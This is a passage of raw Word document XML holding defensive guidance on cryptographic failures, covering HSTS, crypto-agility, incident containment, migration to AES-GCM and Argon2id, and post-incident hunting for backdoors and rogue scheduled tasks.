          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Strict-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>TransportSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> header with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>includeSubDomains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>preload</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> directives. This</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7A4E8E"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lastRenderedPageBreak/>
        <w:t>forces web browsers to interact with the application strictly over HTTPS, neutralizing protocol downgrade attacks entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B246CA3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Crypto-Agility and Quantum Readiness:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Architect systems with cryptographic agility in mind—ensuring that algorithms can be swapped or updated via configuration changes without rewriting the core application logic. This prepares high-risk environments for transitioning to Post-Quantum Cryptography (PQC) standards well ahead of enforcement deadlines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6874E4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Incident Response &amp; Mitigation (If Already Exploited/Present)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65593A33" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Immediate Containment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A9B9B"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When a cryptographic failure is actively exploited in production, incident response teams must move immediately to break the attacker's access vector and protect remaining data assets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D0646C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Disable the Affected Feature:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the exploit targets a specific endpoint or application feature—such as a flawed password reset flow or an unauthenticated file decryption utility—disable that specific service or route immediately via an API gateway or configuration flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A95846" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy Web Application Firewall (WAF) Rules:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the exploit relies on a known </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>sidechannel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or manipulation pattern (like a padding oracle attack targeted at an encrypted session cookie), deploy a custom WAF rule to block requests containing unexpected ciphertext structures or malicious payload anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AC7BDA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Force Global Session Revocation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the attacker has successfully exploited a weak PRNG to predict or forge session identifiers, invalidate all active sessions, JSON Web Tokens (JWTs), and authentication cookies globally. Force all users to re-authenticate against a freshly patched system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E182EF0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Revoke and Rotate Compromised Key Material:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If evidence suggests that cryptographic keys, salts, or API secrets have been leaked (e.g., via a public source repository or directory traversal flaw), immediately deprecate those keys. Issue new keys via a secure Key Management Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD97BD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enforce Strict Network Layer Restrictions:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the vulnerability stems from a transport layer downgrade attack or unencrypted internal traffic, enforce strict reverse-proxy rules to block all non-HTTPS traffic and reject connection requests using weak cipher suites at the edge firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A42EC86" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Remediation/Patching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5478B9BA"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Fixing the underlying flaw permanently requires moving from short-term containment blocks to rigid code and infrastructure remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367A07BC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Upgrade Cryptographic Primitives:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Replace all instances of legacy, broken, or fast algorithms ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>SHA1</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>AES-ECB</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) in the codebase with modern, secure standards. Rehash existing database credentials using a memory-hard algorithm like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Argon2id</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0287981C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Migrate to Managed Cryptography (AEAD):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rewrite encryption and decryption routines to utilize Authenticated Encryption with Associated Data (AEAD) modes such as </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>AES-GCM</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Ensure the application dynamically generates a unique Initialization Vector (IV) via a native CSPRNG wrapper for every operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E3115C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Externalize Key Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remove all keys and hardcoded secrets from configuration files, environment strings, and source control. Re-architect the application to fetch cryptographic keys at runtime from an isolated vault or dedicated cloud HSM utilizing role-based access tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701DD030" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Automate Enforcement of Security Headers:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Update the web server and reverse proxy configurations to inject the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Strict-Transport-Security</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HSTS) header globally, ensuring that clients can never downgrade their connection vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C8A325" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Blast Radius Clean-up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262796E3"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Once the vulnerability is patched, teams must thoroughly investigate the extent of the compromise, locate residual threats, and securely bring systems back online.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D45123"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1. Log Auditing &amp; Data Exposure Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0739A148"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Determine exactly what data the attacker accessed or altered during the window of vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ECFA68" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Analyze Access Logs:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Audit web server, API gateway, and application logs to trace requests originating from the attacker's IP addresses or compromised user sessions. Focus heavily on timestamps to correlate when predictable tokens could have been generated or validated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464F4AE9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Review Database Queries:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a padding oracle or broken cipher mode allowed the attacker to decrypt backend fields, cross-reference database access logs to establish exactly which tables, records, or PII assets were read or modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF9B265" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Integrity Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run automated validation scripts against critical application states (e.g., financial ledger balances, system user privileges) to identify whether the attacker successfully manipulated ciphertext data to execute unauthorized actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083DC029"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2. Persistence Identification (Hunting for Backdoors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440194EC"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Assume the attacker leveraged their access to establish long-term persistence within the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBB0C23" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Audit System Accounts:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inspect the application database and operating system configurations for newly created accounts, altered access control lists (ACLs), or unexpected administrative privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CD4B7F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Inspect File Systems and Repositories:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scan all web directories, upload paths, and temporary file systems for web shells, unauthorized binary files, or obfuscated scripts. Compare the running production environment against a verified master Git commit hash to flag any unauthorized file modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD60421" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Review Scheduled Tasks and Cron Jobs:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Check server configuration files, container definitions, and background workers for rogue tasks designed to re-establish an outbound connection to an attacker's command-and-control server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C693A48"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3. Secure Service Restoration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEDC342"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Safely return the environment to a trusted baseline state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68926B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
